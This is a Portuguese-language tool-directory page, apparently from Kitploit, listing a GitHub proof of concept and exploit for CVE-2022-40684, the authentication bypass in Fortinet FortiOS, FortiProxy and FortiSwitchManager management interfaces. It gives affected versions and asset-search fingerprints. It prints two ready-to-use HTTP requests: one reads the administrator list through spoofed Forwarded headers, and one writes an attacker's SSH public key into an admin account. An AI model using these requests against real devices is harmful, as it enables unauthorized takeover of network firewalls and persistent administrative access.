Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-40684 — PoC e exploit para CVE-2022-40684, um bypass de autenticação nas interfaces de gerenciamento do Fortinet FortiOS, FortiProxy e FortiSwitchManager, permitindo acesso administrativo não autorizado através de requisições HTTP manipuladas. | Kitploit
Ferramentas/GitHubGitHub/hughink/cve-2022-40684
Autenticação e AutorizaçãoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubhughink/cve-2022-40684

CVE-2022-40684

PoC e exploit para CVE-2022-40684, um bypass de autenticação nas interfaces de gerenciamento do Fortinet FortiOS, FortiProxy e FortiSwitchManager, permitindo acesso administrativo não autorizado através de requisições HTTP manipuladas.

Ver Repositório
11324há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-40684

Cumprimento da Lei:

Qualquer indivíduo ou organização que utilize a rede deve cumprir a lei constitucional, a ordem pública, respeitar a moral social, não prejudicar a segurança da rede, e não usar a rede para prejudicar a segurança, honra e interesses nacionais.

Resumo da Vulnerabilidade:

A Fortinet é uma fornecedora globalmente conhecida de produtos e soluções de segurança cibernética, incluindo firewalls, antivírus, sistemas de prevenção de intrusões e componentes de segurança de endpoints. Na interface de gerenciamento dos produtos afetados FortiOS, FortiProxy e FortiSwitchManager, é possível contornar a autenticação usando um caminho ou canal alternativo e operar a interface de gerenciamento sem autenticação por meio de solicitações HTTP ou HTTPS especialmente criadas.

Nível de Risco :

Alto

Versões Afetadas:

FortiOS versão 7.2.0 - 7.2.1

FortiOS versão 7.0.0 - 7.0.6

FortiProxy versão 7.2.0

FortiProxy versão 7.0.0 - 7.0.6

FortiSwitchManager versão 7.2.0

FortiSwitchManager versão 7.0.0

Detecção de Ativos:

title="FortiProxy"

title="FortiGate"

Exploração da Vulnerabilidade:

PoC

image

root@kitploit:~
GET /api/v2/cmdb/system/admin HTTP/1.1
Host: 目标
User-Agent: Node.js
Accept-Encoding: gzip, deflate
Accept: */*
Hosts: 127.0.0.1:9980
Forwarded: by="[127.0.0.1]:80";for="[127.0.0.1]:49490";proto=http;host=
X-Forwarded-Vdom: root

EXP

image

root@kitploit:~
PUT /api/v2/cmdb/system/admin/用户名 HTTP/2
Host: 目标
User-Agent: Report Runner
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Forwarded: for="[127.0.0.1]:8888";by="[127.0.0.1]:8888"
Content-Length: 589
Content-Type: application/json

{"ssh-public-key1": "\"公钥内容\""}

image

image

Baixar ferramenta